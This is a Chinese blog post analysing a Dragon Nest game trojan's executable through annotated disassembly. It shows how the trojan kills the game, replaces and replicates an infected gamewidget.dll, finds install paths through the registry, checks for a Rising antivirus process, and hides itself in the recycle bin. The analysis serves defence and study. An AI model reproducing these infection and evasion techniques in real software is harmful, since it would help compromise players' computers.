最新消息:

一个龙之谷木马的分析

分析 admin 2950浏览 0评论

只分析了exe,感染的dll下次分析

exe

去除启动时候的小漏斗

004017C9  |.  53            push    ebx
004017CA  |.  55            push    ebp
004017CB  |.  56            push    esi
004017CC  |.  57            push    edi
004017CD  |.  FF15 AC104000 call    dword ptr [<&USER32.GetInputStat>; [GetInputState
004017D3  |.  33DB          xor     ebx, ebx
004017D5  |.  53            push    ebx                              ; /lParam => 0
004017D6  |.  53            push    ebx                              ; |wParam => 0
004017D7  |.  53            push    ebx                              ; |Message => WM_NULL
004017D8  |.  FF15 64104000 call    dword ptr [<&KERNEL32.GetCurrent>; |[GetCurrentThreadId
004017DE  |.  50            push    eax                              ; |ThreadId
004017DF  |.  FF15 B0104000 call    dword ptr [<&USER32.PostThreadMe>; PostThreadMessageA
004017E5  |.  53            push    ebx                              ; /MsgFilterMax => 0
004017E6  |.  53            push    ebx                              ; |MsgFilterMin => 0
004017E7  |.  8D4424 1C     lea     eax, dword ptr [esp+1C]          ; |
004017EB  |.  53            push    ebx                              ; |hWnd => NULL
004017EC  |.  50            push    eax                              ; |pMsg
004017ED  |.  FF15 B4104000 call    dword ptr [<&USER32.GetMessageA>>; GetMessageA

 

读取附加数据

004017F8  |.  68 1C284000   push    0040281C                         ; /Buffer = ctfmon.0040281C
004017FD  |.  56            push    esi                              ; |BufSize => 104 (260.)
004017FE  |.  FF15 60104000 call    dword ptr [<&KERNEL32.GetLogical>; GetLogicalDriveStringsA
00401804  |.  6A 40         push    40                               ;  获取磁盘
00401806  |.  33C0          xor     eax, eax
00401808  |.  59            pop     ecx
00401809  |.  8D7C24 31     lea     edi, dword ptr [esp+31]
0040180D  |.  885C24 30     mov     byte ptr [esp+30], bl
00401811  |.  56            push    esi                              ; /BufSize => 104 (260.)
00401812  |.  F3:AB         rep     stos dword ptr es:[edi]          ; |
00401814  |.  66:AB         stos    word ptr es:[edi]                ; |
00401816  |.  AA            stos    byte ptr es:[edi]                ; |
00401817  |.  8D4424 34     lea     eax, dword ptr [esp+34]          ; |
0040181B  |.  895C24 14     mov     dword ptr [esp+14], ebx          ; |
0040181F  |.  50            push    eax                              ; |PathBuffer
00401820  |.  53            push    ebx                              ; |hModule => NULL
00401821  |.  FF15 48104000 call    dword ptr [<&KERNEL32.GetModuleF>; GetModuleFileNameA
00401827  |.  8B3D 5C104000 mov     edi, dword ptr [<&KERNEL32.SetFi>;  获取自身路径
0040182D  |.  8B2D 58104000 mov     ebp, dword ptr [<&KERNEL32.ReadF>;  kernel32.ReadFile
00401833  |>  53            /push    ebx                             ; /hTemplateFile
00401834  |.  53            |push    ebx                             ; |Attributes
00401835  |.  6A 03         |push    3                               ; |Mode = OPEN_EXISTING
00401837  |.  53            |push    ebx                             ; |pSecurity
00401838  |.  53            |push    ebx                             ; |ShareMode
00401839  |.  8D4424 44     |lea     eax, dword ptr [esp+44]         ; |
0040183D  |.  68 00000080   |push    80000000                        ; |Access = GENERIC_READ
00401842  |.  50            |push    eax                             ; |FileName
00401843  |.  FF15 28104000 |call    dword ptr [<&KERNEL32.CreateFil>; CreateFileA
00401849  |.  8BF0          |mov     esi, eax                        ;  打开自身
0040184B  |.  3BF3          |cmp     esi, ebx
0040184D  |.  74 3B         |je      short 0040188A
0040184F  |.  6A 02         |push    2
00401851  |.  53            |push    ebx
00401852  |.  68 3CFEFFFF   |push    -1C4
00401857  |.  56            |push    esi
00401858  |.  FFD7          |call    edi                             ;  kernel32.SetFilePointer
0040185A  |.  8D4424 10     |lea     eax, dword ptr [esp+10]         ;  设置指针
0040185E  |.  53            |push    ebx
0040185F  |.  50            |push    eax
00401860  |.  68 C4010000   |push    1C4
00401865  |.  68 201A4000   |push    00401A20
0040186A  |.  56            |push    esi
0040186B  |.  FFD5          |call    ebp                             ;  kernel32.ReadFile
0040186D  |.  A1 E01B4000   |mov     eax, dword ptr [401BE0]         ;  读取附加数据
00401872  |.  3BC3          |cmp     eax, ebx
00401874  |.  77 23         |ja      short 00401899
00401876  |.  68 E8030000   |push    3E8                             ; /Timeout = 1000. ms
0040187B  |.  FF15 44104000 |call    dword ptr [<&KERNEL32.Sleep>]   ; Sleep
00401881  |.  56            |push    esi                             ; /hObject
00401882  |.  FF15 20104000 |call    dword ptr [<&KERNEL32.CloseHand>; CloseHandle
00401888  |.^ EB A9         jmp     short 00401833                  ; 读取失败则返回
0040188A  |>  5F            pop     edi
0040188B  |.  5E            pop     esi
0040188C  |.  5D            pop     ebp
0040188D  |.  33C0          xor     eax, eax
0040188F  |.  5B            pop     ebx
00401890  |.  81C4 2C030000 add     esp, 32C
00401896  |.  C2 1000       retn    10
00401899  |> 50            push    eax
0040189A  |.  E8 69010000   call    <jmp.&MSVCRT.operator new>
0040189F  |.  A3 20294000   mov     dword ptr [402920], eax
004018A4  |.  B8 3CFEFFFF   mov     eax, -1C4
004018A9  |.  2B05 E01B4000 sub     eax, dword ptr [401BE0]
004018AF  |.  59            pop     ecx
004018B0  |.  6A 02         push    2
004018B2  |.  53            push    ebx
004018B3  |.  50            push    eax
004018B4  |.  56            push    esi
004018B5  |.  FFD7          call    edi                              ;  kernel32.SetFilePointer
004018B7  |.  8D4424 10     lea     eax, dword ptr [esp+10]          ;  设置文件指针
004018BB  |.  53            push    ebx
004018BC  |.  50            push    eax
004018BD  |.  FF35 E01B4000 push    dword ptr [401BE0]
004018C3  |.  FF35 20294000 push    dword ptr [402920]
004018C9  |.  56            push    esi
004018CA  |.  FFD5          call    ebp                              ;  kernel32.ReadFile
004018CC  |.  56            push    esi                              ; /读取附加数据
004018CD  |.  FF15 20104000 call    dword ptr [<&KERNEL32.CloseHandl>; CloseHandle
004018D3  |.  E8 4CF9FFFF   call    00401224                         ;  释放句柄

查找龙之谷进程,找到则结束该进程

004011C0  /$  55            push    ebp                              ;  kernel32.ReadFile
004011C1  |.  8BEC          mov     ebp, esp
004011C3  |.  81EC 28010000 sub     esp, 128
004011C9  |.  56            push    esi
004011CA  |.  6A 00         push    0                                ; /ProcessID = 0
004011CC  |.  6A 02         push    2                                ; |Flags = TH32CS_SNAPPROCESS
004011CE  |.  E8 23080000   call    <jmp.&KERNEL32.CreateToolhelp32S>; CreateToolhelp32Snapshot
004011D3  |.  8BF0          mov     esi, eax
004011D5  |.  8D85 D8FEFFFF lea     eax, dword ptr [ebp-128]
004011DB  |.  50            push    eax                              ; /lppe
004011DC  |.  56            push    esi                              ; |hSnapshot
004011DD  |.  C785 D8FEFFFF>mov     dword ptr [ebp-128], 128         ; |
004011E7  |.  E8 04080000   call    <jmp.&KERNEL32.Process32First>   ; Process32First
004011EC  |.  85C0          test    eax, eax
004011EE  |.  74 2F         je      short 0040121F
004011F0  |>  8D85 D8FEFFFF /lea     eax, dword ptr [ebp-128]
004011F6  |.  50            |push    eax                             ; /lppe
004011F7  |.  56            |push    esi                             ; |hSnapshot
004011F8  |.  E8 ED070000   |call    <jmp.&KERNEL32.Process32Next>   ; Process32Next
004011FD  |.  85C0          |test    eax, eax
004011FF  |.  74 1E         |je      short 0040121F
00401201  |.  8D85 FCFEFFFF |lea     eax, dword ptr [ebp-104]
00401207  |.  50            |push    eax                             ; /s2
00401208  |.  FF75 08       |push    dword ptr [ebp+8]               ; |s1
0040120B  |.  FF15 9C104000 |call    dword ptr [<&MSVCRT._stricmp>]  ; _stricmp
00401211  |.  59            |pop     ecx        ; 查找龙之谷进程
00401212  |.  85C0          |test    eax, eax
00401214  |.  59            |pop     ecx
00401215  |.^ 75 D9         jnz     short 004011F0
00401217  |.  8B85 E0FEFFFF mov     eax, dword ptr [ebp-120]
0040121D  |.  EB 02         jmp     short 00401221
0040121F  |>  33C0          xor     eax, eax
00401221  |>  5E            pop     esi
00401222  |.  C9            leave
00401223  .  C3            retn

0040122F  |.  50            push    eax                              ; /ProcessId
00401230  |.  6A 00         push    0                                ; |Inheritable = FALSE
00401232  |.  6A 01         push    1                                ; |Access = TERMINATE
00401234  |.  FF15 10104000 call    dword ptr [<&KERNEL32.OpenProces>; OpenProcess
0040123A  |.  6A 00         push    0                                ; /ExitCode = 0
0040123C  |.  50            push    eax                              ; |hProcess
0040123D  |.  FF15 3C104000 call    dword ptr [<&KERNEL32.TerminateP>; TerminateProcess
00401243  .  C3            retn         ; 存在则结束进程

游戏目录下原来的gamewidget.dll拷贝DragonNestRes.dll,然后感染gamewidget.dll并复制一份midimap.dll

004015C2  |.  50            push    eax                              ; /pHandle
004015C3  |.  33DB          xor     ebx, ebx                         ; |
004015C5  |.  68 19000200   push    20019                            ; |Access = KEY_READ
004015CA  |.  53            push    ebx                              ; |Reserved => 0
004015CB  |.  68 64114000   push    00401164                         ; |Subkey = "SOFTWAREsndadn"
004015D0  |.  68 02000080   push    80000002                         ; |hKey = HKEY_LOCAL_MACHINE
004015D5  |.  FF15 08104000 call    dword ptr [<&ADVAPI32.RegOpenKey>; RegOpenKeyExA
004015DB  |.  85C0          test    eax, eax                         ;  读取HKEY_LOCAL_MACHINESOFTWAREsndadn
004015DD  |. /0F85 8C000000 jnz     0040166F        ; 读取不到则返回
004015E3  |. |6A 40         push    40
004015E5  |. |8DBD F1FEFFFF lea     edi, dword ptr [ebp-10F]
004015EB  |. |59            pop     ecx
004015EC  |. |889D F0FEFFFF mov     byte ptr [ebp-110], bl
004015F2  |. |F3:AB         rep     stos dword ptr es:[edi]
004015F4  |. |66:AB         stos    word ptr es:[edi]
004015F6  |. |AA            stos    byte ptr es:[edi]
004015F7  |. |8D45 F8       lea     eax, dword ptr [ebp-8]
004015FA  |. |C745 F4 01000>mov     dword ptr [ebp-C], 1
00401601  |. |50            push    eax                              ; /pBufSize
00401602  |. |8D85 F0FEFFFF lea     eax, dword ptr [ebp-110]         ; |
00401608  |. |50            push    eax                              ; |Buffer
00401609  |. |8D45 F4       lea     eax, dword ptr [ebp-C]           ; |
0040160C  |. |50            push    eax                              ; |pValueType
0040160D  |. |53            push    ebx                              ; |Reserved => NULL
0040160E  |. |68 58114000   push    00401158                         ; |ValueName = "MainProg"
00401613  |. |C745 F8 04010>mov     dword ptr [ebp-8], 104           ; |
0040161A  |. |FF75 FC       push    dword ptr [ebp-4]                ; |hKey
0040161D  |. |FF15 04104000 call    dword ptr [<&ADVAPI32.RegQueryVa>; RegQueryValueExA
00401623  |. |85C0          test    eax, eax                         ;  读取路径
004013B3  |.  50            push    eax                              ; /FileName
004013B4  |.  FF15 30104000 call    dword ptr [<&KERNEL32.GetFileAtt>; GetFileAttributesA
004013BA  |.  83F8 FF       cmp     eax, -1                          ;  获取文件的属性,用来判断DragonNestRes.dll是否存在
004013BD  |.  75 15         jnz     short 004013D4
004013BF  |.  8D85 F4FDFFFF lea     eax, dword ptr [ebp-20C]
004013C5  |.  53            push    ebx                              ; /FailIfExists
004013C6  |.  50            push    eax                              ; |NewFileName
004013C7  |.  8D85 F8FEFFFF lea     eax, dword ptr [ebp-108]         ; |
004013CD  |.  50            push    eax                              ; |ExistingFileName
004013CE  |.  FF15 2C104000 call    dword ptr [<&KERNEL32.CopyFileA>>; CopyFileA
004013D4  |>  8D85 F8FEFFFF lea     eax, dword ptr [ebp-108]         ;  不存在则在游戏目录用原来的gamewidget.dll拷贝DragonNestRes.dll

00401299  /$  55            push    ebp
0040129A  |.  8BEC          mov     ebp, esp
0040129C  |.  81EC 08020000 sub     esp, 208
004012A2  |.  56            push    esi
004012A3  |.  8B75 08       mov     esi, dword ptr [ebp+8]
004012A6  |.  56            push    esi                              ; /FileName
004012A7  |.  FF15 1C104000 call    dword ptr [<&KERNEL32.DeleteFile>; DeleteFileA
004012AD  |.  6A 00         push    0                                ; /删除gamewidget.dll
004012AF  |.  56            push    esi                              ; |path
004012B0  |.  FF15 A0104000 call    dword ptr [<&MSVCRT._access>]    ; _access
004012B6  |.  59            pop     ecx                              ;  判断是否删除成功
00401401  |.  53            push    ebx                              ; /hTemplateFile
00401402  |.  53            push    ebx                              ; |Attributes
00401403  |.  6A 01         push    1                                ; |Mode = CREATE_NEW
00401405  |.  53            push    ebx                              ; |pSecurity
00401406  |.  53            push    ebx                              ; |ShareMode
00401407  |.  68 00000040   push    40000000                         ; |Access = GENERIC_WRITE
0040140C  |.  50            push    eax                              ; |FileName
0040140D  |.  FF15 28104000 call    dword ptr [<&KERNEL32.CreateFile>; CreateFileA
00401413  |.  8BF8          mov     edi, eax                         ;  创建新的gamewidget.dll
00401415  |.  3BFB          cmp     edi, ebx
00401417  |.  75 07         jnz     short 00401420
00401419  |.  33C0          xor     eax, eax
0040141B  |.  E9 A5000000   jmp     004014C5
00401420  |>  8D45 FC       lea     eax, dword ptr [ebp-4]
00401423  |.  53            push    ebx                              ; /pOverlapped
00401424  |.  50            push    eax                              ; |pBytesWritten
00401425  |.  8B35 24104000 mov     esi, dword ptr [<&KERNEL32.Write>; |kernel32.WriteFile
0040142B  |.  FF35 E01B4000 push    dword ptr [401BE0]               ; |nBytesToWrite = 2A00 (10752.)
00401431  |.  FF35 20294000 push    dword ptr [402920]               ; |Buffer = 003D4380
00401437  |.  57            push    edi                              ; |hFile
00401438  |.  FFD6          call    esi                              ; WriteFile
0040143A  |.  C745 0C D0070>mov     dword ptr [ebp+C], 7D0           ;  写入DLL
00401441  |> /8D45 FC       /lea     eax, dword ptr [ebp-4]
00401444  |. |53            |push    ebx
00401445  |. |50            |push    eax
00401446  |. |FF35 E01B4000 |push    dword ptr [401BE0]
0040144C  |. |FF35 20294000 |push    dword ptr [402920]
00401452  |. |57            |push    edi
00401453  |. |FFD6          |call    esi
00401455  |. |FF4D 0C       |dec     dword ptr [ebp+C]
00401458  |.^75 E7         jnz     short 00401441                  ;  再重复写入2000次,曾大文件体积
0040145A  |.  8D45 FC       lea     eax, dword ptr [ebp-4]
0040145D  |.  53            push    ebx
0040145E  |.  50            push    eax
0040145F  |.  68 C4010000   push    1C4
00401464  |.  68 201A4000   push    00401A20
00401469  |.  57            push    edi
0040146A  |.  FFD6          call    esi                              ;  kernel32.WriteFile
0040146C  |.  57            push    edi                              ; /写入附加数据
0040146D  |.  FF15 20104000 call    dword ptr [<&KERNEL32.CloseHandl>; CloseHandle
00401473  |.  6A 40         push    40                               ;  释放句柄
004014AD  |.  8D85 F0FCFFFF lea     eax, dword ptr [ebp-310]
004014B3  |.  53            push    ebx                              ; /FailIfExists
004014B4  |.  50            push    eax                              ; |NewFileName
004014B5  |.  8D85 F8FEFFFF lea     eax, dword ptr [ebp-108]         ; |
004014BB  |.  50            push    eax                              ; |ExistingFileName = "C:Program Files?,A2,"",B4,"笸鏫龙之谷gamewidget.dll"
004014BC  |.  FF15 2C104000 call    dword ptr [<&KERNEL32.CopyFileA>>; CopyFileA
004014C2  |.  6A 01         push    1                                ;  已经替换的gamewidget.dll拷贝midimap.dll

再次感染

00401684  |.  50            push    eax                              ; /pHandle
00401685  |.  33DB          xor     ebx, ebx                         ; |
00401687  |.  68 19000200   push    20019                            ; |Access = KEY_READ
0040168C  |.  53            push    ebx                              ; |Reserved => 0
0040168D  |.  68 84114000   push    00401184                         ; |Subkey = "SoftwareMicrosoftWindowsShellNoRoamMUICache"
00401692  |.  68 01000080   push    80000001                         ; |hKey = HKEY_CURRENT_USER
00401697  |.  FF15 08104000 call    dword ptr [<&ADVAPI32.RegOpenKey>; RegOpenKeyExA
0040169D  |.  85C0          test    eax, eax                         ;  打开HKEY_CURRENT_USERSoftwareMicrosoftWindowsShellNoRoamMUICache
0040169F  |. /0F85 17010000 jnz     004017BC
004016A5  |. |895D FC       mov     dword ptr [ebp-4], ebx
004016A8  |. |BE 04010000   mov     esi, 104
004016AD  |> |6A 40         /push    40
004016AF  |. |33C0          |xor     eax, eax
004016B1  |. |59            |pop     ecx
004016B2  |. |8DBD E5FEFFFF |lea     edi, dword ptr [ebp-11B]
004016B8  |. |889D E4FEFFFF |mov     byte ptr [ebp-11C], bl
004016BE  |. |6A 40         |push    40
004016C0  |. |F3:AB         |rep     stos dword ptr es:[edi]
004016C2  |. |66:AB         |stos    word ptr es:[edi]
004016C4  |. |AA            |stos    byte ptr es:[edi]
004016C5  |. |59            |pop     ecx
004016C6  |. |33C0          |xor     eax, eax
004016C8  |. |8DBD D9FBFFFF |lea     edi, dword ptr [ebp-427]
004016CE  |. |889D D8FBFFFF |mov     byte ptr [ebp-428], bl
004016D4  |. |F3:AB         |rep     stos dword ptr es:[edi]
004016D6  |. |8D4D EC       |lea     ecx, dword ptr [ebp-14]
004016D9  |. |8975 F0       |mov     dword ptr [ebp-10], esi
004016DC  |. |51            |push    ecx                             ; /pBufSize
004016DD  |. |8D8D D8FBFFFF |lea     ecx, dword ptr [ebp-428]        ; |
004016E3  |. |51            |push    ecx                             ; |Buffer
004016E4  |. |8D4D F8       |lea     ecx, dword ptr [ebp-8]          ; |
004016E7  |. |66:AB         |stos    word ptr es:[edi]               ; |
004016E9  |. |51            |push    ecx                             ; |pValueType
004016EA  |. |8D4D F0       |lea     ecx, dword ptr [ebp-10]         ; |
004016ED  |. |53            |push    ebx                             ; |Reserved
004016EE  |. |51            |push    ecx                             ; |pValueCount
004016EF  |. |AA            |stos    byte ptr es:[edi]               ; |
004016F0  |. |8B45 FC       |mov     eax, dword ptr [ebp-4]          ; |
004016F3  |. |FF45 FC       |inc     dword ptr [ebp-4]               ; |
004016F6  |. |8D8D E4FEFFFF |lea     ecx, dword ptr [ebp-11C]        ; |
004016FC  |. |C745 F8 01000>|mov     dword ptr [ebp-8], 1            ; |
00401703  |. |51            |push    ecx                             ; |Value
00401704  |. |50            |push    eax                             ; |Index
00401705  |. |FF75 F4       |push    dword ptr [ebp-C]               ; |hKey
00401708  |. |8975 EC       |mov     dword ptr [ebp-14], esi         ; |
0040170B  |. |FF15 00104000 |call    dword ptr [<&ADVAPI32.RegEnumVa>; RegEnumValueA
00401711  |. |85C0          |test    eax, eax                        ;  读取键值
00401713  |. |0F85 A3000000 |jnz     004017BC
00401719  |. |6A 40         |push    40
0040171B  |. |8DBD DDFCFFFF |lea     edi, dword ptr [ebp-323]
00401721  |. |59            |pop     ecx
00401722  |. |889D DCFCFFFF |mov     byte ptr [ebp-324], bl
00401728  |. |F3:AB         |rep     stos dword ptr es:[edi]
0040172A  |. |66:AB         |stos    word ptr es:[edi]
0040172C  |. |AA            |stos    byte ptr es:[edi]
0040172D  |. |8D45 E8       |lea     eax, dword ptr [ebp-18]
00401730  |. |8975 E8       |mov     dword ptr [ebp-18], esi
00401733  |. |50            |push    eax                             ; /pBufSize
00401734  |. |8D85 DCFCFFFF |lea     eax, dword ptr [ebp-324]        ; |
0040173A  |. |50            |push    eax                             ; |Buffer
0040173B  |. |8D45 F8       |lea     eax, dword ptr [ebp-8]          ; |
0040173E  |. |50            |push    eax                             ; |pValueType
0040173F  |. |8D85 E4FEFFFF |lea     eax, dword ptr [ebp-11C]        ; |
00401745  |. |53            |push    ebx                             ; |Reserved
00401746  |. |50            |push    eax                             ; |ValueName
00401747  |. |FF75 F4       |push    dword ptr [ebp-C]               ; |hKey
0040174A  |. |FF15 04104000 |call    dword ptr [<&ADVAPI32.RegQueryV>; RegQueryValueExA
00401750  |. |85C0          |test    eax, eax                        ;  读取LangID
00401752  |.^|0F85 55FFFFFF |jnz     004016AD
00401758  |. |8D85 DCFCFFFF |lea     eax, dword ptr [ebp-324]
0040175E  |. |68 78114000   |push    00401178                        ; /s2 = "dragonnest"
00401763  |. |50            |push    eax                             ; |s1 = "?,AC,"?,B6,"终",B6,"?
00401764  |. |FF15 8C104000 |call    dword ptr [<&MSVCRT.strstr>]    ; strstr
0040176A  |. |59            |pop     ecx                             ;  查找值为dragonnest的项
0040176B  |. |85C0          |test    eax, eax
0040176D  |. |59            |pop     ecx
0040176E  |.^|0F84 39FFFFFF je      004016AD

……再一次感染。。。

查找瑞星进程,没找到则把自身移动到回收站,随机文件名

004018E2  |.  BD B4114000   mov     ebp, 004011B4                    ;  ASCII "RavMonD.exe"
004018E7  |.  55            push    ebp
004018E8  |.  E8 D3F8FFFF   call    004011C0                         ;  查找RavMonD.exe,没找到则把自身移动到回收站,随机文件名

00401511  |.  68 04010000   push    104                              ; /BufSize = 104 (260.)
00401516  |.  50            push    eax                              ; |PathBuffer
00401517  |.  6A 00         push    0                                ; |hModule = NULL
00401519  |.  FF15 48104000 call    dword ptr [<&KERNEL32.GetModuleF>; GetModuleFileNameA
0040151F  |.  8B35 54104000 mov     esi, dword ptr [<&KERNEL32.GetTi>;  获取自身路径
00401525  |.  FFD6          call    esi                              ; [GetTickCount
00401527  |.  50            push    eax                              ; /获取启动时间
00401528  |.  8B3D A8104000 mov     edi, dword ptr [<&USER32.wsprint>; |USER32.wsprintfA
0040152E  |.  0FBE85 FCFEFF>movsx   eax, byte ptr [ebp-104]          ; |
00401535  |.  50            push    eax                              ; |<%c>
00401536  |.  8D85 F8FDFFFF lea     eax, dword ptr [ebp-208]         ; |
0040153C  |.  68 44114000   push    00401144                         ; |Format = "%c:RECYCLER%d.tmp"
00401541  |.  50            push    eax                              ; |s
00401542  |.  FFD7          call    edi                              ; wsprintfA
00401544  |.  8B1D 1C104000 mov     ebx, dword ptr [<&KERNEL32.Delet>;  构造路径C:RECYCLER4143625.tmp
0040154A  |.  83C4 10       add     esp, 10
0040154D  |.  8D85 F8FDFFFF lea     eax, dword ptr [ebp-208]
00401553  |.  50            push    eax                              ; /FileName
00401554  |.  FFD3          call    ebx                              ; DeleteFileA
00401556  |.  85C0          test    eax, eax                         ;  删除文件(如果已存在)
00401558  |.  75 30         jnz     short 0040158A
0040155A  |.  FF15 50104000 call    dword ptr [<&KERNEL32.GetLastErr>; [GetLastError
00401560  |.  83F8 03       cmp     eax, 3
00401563  |.  75 25         jnz     short 0040158A
00401565  |.  FFD6          call    esi
00401567  |.  50            push    eax                              ;  获取启动时间
00401568  |.  0FBE85 FCFEFF>movsx   eax, byte ptr [ebp-104]
0040156F  |.  50            push    eax
00401570  |.  8D85 F8FDFFFF lea     eax, dword ptr [ebp-208]
00401576  |.  68 30114000   push    00401130                         ;  ASCII "%c:Recycled%d.tmp"
0040157B  |.  50            push    eax
0040157C  |.  FFD7          call    edi                              ;  wsprintfA
0040157E  |.  83C4 10       add     esp, 10                          ;  构造C:Recycled4273328.tmp
00401581  |.  8D85 F8FDFFFF lea     eax, dword ptr [ebp-208]
00401587  |.  50            push    eax
00401588  |.  FFD3          call    ebx
0040158A  |>  8D85 F8FDFFFF lea     eax, dword ptr [ebp-208]         ;  删除文件(如果已存在)
00401590  |.  50            push    eax                              ; /NewName
00401591  |.  8D85 FCFEFFFF lea     eax, dword ptr [ebp-104]         ; |
00401597  |.  50            push    eax                              ; |ExistingName
00401598  |.  FF15 4C104000 call    dword ptr [<&KERNEL32.MoveFileA>>; MoveFileA
0040159E  |.  6A 04         push    4                                ; /移动自身到C:Recycled4273328.tmp
004015A0  |.  8D85 F8FDFFFF lea     eax, dword ptr [ebp-208]         ; |
004015A6  |.  6A 00         push    0                                ; |NewName = NULL
004015A8  |.  50            push    eax                              ; |ExistingName
004015A9  |.  FF15 14104000 call    dword ptr [<&KERNEL32.MoveFileEx>; MoveFileExA

感染安装龙之谷的所有磁盘

[sourcode]

004018F7  |>  6A 40         /push    40
004018F9  |. |33C0          |xor     eax, eax
004018FB  |. |59            |pop     ecx
004018FC  |. |8DBC24 350100>|lea     edi, dword ptr [esp+135]
00401903  |. |889C24 340100>|mov     byte ptr [esp+134], bl
0040190A  |. |BE 1C284000   |mov     esi, 0040281C                   ;  ASCII “A:”
0040190F  |. |F3:AB         |rep     stos dword ptr es:[edi]
00401911  |. |66:AB         |stos    word ptr es:[edi]
00401913  |. |AA            |stos    byte ptr es:[edi]
00401914  |. |33FF          |xor     edi, edi
00401916  |. |381D 1C284000 |cmp     byte ptr [40281C], bl
0040191C  |. |0F84 84000000 |je      004019A6
00401922  |> |56            |/push    esi                            ; /RootPathName
00401923  |. |FF15 38104000 ||call    dword ptr [<&KERNEL32.GetDrive>; GetDriveTypeA
00401929  |. |83F8 03       ||cmp     eax, 3                         ;  获取磁盘类型
0040192C  |. |75 63         ||jnz     short 00401991                 ;  判断是否为固定磁盘
0040192E  |. |8D8424 340100>||lea     eax, dword ptr [esp+134]       ;  是则执行
00401935  |. |50            ||push    eax
00401936  |. |68 C8104000   ||push    004010C8                       ;  ASCII “dnlauncher.exe”
0040193B  |. |56            ||push    esi
0040193C  |. |FF15 BC104000 ||call    dword ptr [<&dbghelp.SearchTre>;  dbghelp.SearchTreeForFile
00401942  |. |85C0          ||test    eax, eax                       ;  查找是否存在dnlauncher.exe
00401944  |. |74 4B         ||je      short 00401991
00401946  |. |6A 40         ||push    40
00401948  |. |33C0          ||xor     eax, eax
0040194A  |. |59            ||pop     ecx
0040194B  |. |8DBC24 390200>||lea     edi, dword ptr [esp+239]
00401952  |. |889C24 380200>||mov     byte ptr [esp+238], bl
00401959  |. |53            ||push    ebx
0040195A  |. |F3:AB         ||rep     stos dword ptr es:[edi]
0040195C  |. |66:AB         ||stos    word ptr es:[edi]
0040195E  |. |AA            ||stos    byte ptr es:[edi]
0040195F  |. |8D8424 3C0200>||lea     eax, dword ptr [esp+23C]
00401966  |. |50            ||push    eax
00401967  |. |8D8424 3C0100>||lea     eax, dword ptr [esp+13C]
0040196E  |. |50            ||push    eax
0040196F  |. |E8 D0F8FFFF   ||call    00401244                       ;  取dnlauncher.exe的路径
00401974  |. |E8 ABF8FFFF   ||call    00401224                       ;  结束进程
00401979  |. |8D8424 440200>||lea     eax, dword ptr [esp+244]
00401980  |. |68 E8104000   ||push    004010E8                       ;  ASCII “gamewidget.dll”
00401985  |. |50            ||push    eax
00401986  |. |E8 BAF9FFFF   ||call    00401345                       ;  再次感染
0040198B  |. |83C4 14       ||add     esp, 14
0040198E  |. |6A 01         ||push    1
00401990  |. |5F            ||pop     edi
00401991  |> |56            ||push    esi                            ; /String
00401992  |. |FF15 34104000 ||call    dword ptr [<&KERNEL32.lstrlenA>; lstrlenA
00401998  |. |385C06 01     ||cmp     byte ptr [esi+eax+1], bl
0040199C  |. |8D7406 01     ||lea     esi, dword ptr [esi+eax+1]
004019A0  |.^|75 80         |jnz     short 00401922
004019A2  |. |3BFB          |cmp     edi, ebx
004019A4  |. |75 10         |jnz     short 004019B6
004019A6  |> |68 20BF0200   |push    2BF20                           ; /Timeout = 180000. ms
004019AB  |. |FF15 44104000 |call    dword ptr [<&KERNEL32.Sleep>]   ; Sleep
004019B1  |.^E9 41FFFFFF   jmp     004018F7
004019B6  |>  FF35 20294000 push    dword ptr [402920]
004019BC  |.  E8 4D000000   call    <jmp.&MSVCRT.operator delete>
004019C1  |.  55            push    ebp
004019C2  |.  E8 F9F7FFFF   call    004011C0
004019C7  |.  59            pop     ecx
004019C8  |.  85C0          test    eax, eax
004019CA  |.  59            pop     ecx
004019CB  |.  75 07         jnz     short 004019D4
004019CD  |.  E8 16FBFFFF   call    004014E8
004019D2  |.  EB 0E         jmp     short 004019E2
004019D4  |>  6A 04         push    4                                ; /Flags = DELAY_UNTIL_REBOOT
004019D6  |.  8D4424 34     lea     eax, dword ptr [esp+34]          ; |
004019DA  |.  53            push    ebx                              ; |NewName
004019DB  |.  50            push    eax                              ; |ExistingName
004019DC  |.  FF15 14104000 call    dword ptr [<&KERNEL32.MoveFileEx>; MoveFileExA
004019E2  |>  53            push    ebx                              ; /自身移动到回收站
004019E3  |.  FF15 7C104000 call    dword ptr [<&MSVCRT.exit>]       ; exit
004019E9  |.  CC            int3                                     ;  退出

[/sourcode]

转载请注明:爱开源 » 一个龙之谷木马的分析

您必须 登录 才能发表评论!